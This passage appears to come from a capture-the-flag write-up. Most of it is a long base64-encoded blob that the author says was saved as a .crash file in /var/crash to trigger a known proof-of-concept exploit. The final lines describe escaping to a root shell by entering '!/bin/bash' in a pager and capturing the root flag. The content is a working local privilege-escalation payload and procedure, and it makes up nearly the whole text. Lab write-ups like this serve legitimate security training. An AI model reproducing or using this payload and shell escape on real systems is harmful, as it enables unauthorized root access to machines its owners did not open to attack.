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 I manually created a crash file at /var/crash with .crash extension with the above content and the exploit just worked fine as mentioned in the POC.
To get a root shell enter the below command in the pager view: !/bin/bash
We have successfully got a shell with root privileges.
Successfully got the root flag.
Thank You……
